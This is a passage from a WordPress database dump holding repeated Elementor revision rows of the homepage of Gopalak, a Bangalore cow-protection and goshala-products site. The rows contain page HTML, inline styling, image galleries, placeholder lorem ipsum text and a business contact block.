<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:45:03','2022-10-13 10:15:03','',1373,'https://gopalak.in/?p=1694',0,'revision','',0),(1695,1,'2022-10-13 15:45:03','2022-10-13 10:15:03','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:45:03','2022-10-13 10:15:03','',1373,'https://gopalak.in/?p=1695',0,'revision','',0),(1696,1,'2022-10-13 15:45:04','2022-10-13 10:15:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:45:04','2022-10-13 10:15:04','',1373,'https://gopalak.in/?p=1696',0,'revision','',0),(1697,1,'2022-10-13 15:46:07','2022-10-13 10:16:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:46:07','2022-10-13 10:16:07','',1373,'https://gopalak.in/?p=1697',0,'revision','',0),(1698,1,'2022-10-13 15:46:07','2022-10-13 10:16:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading 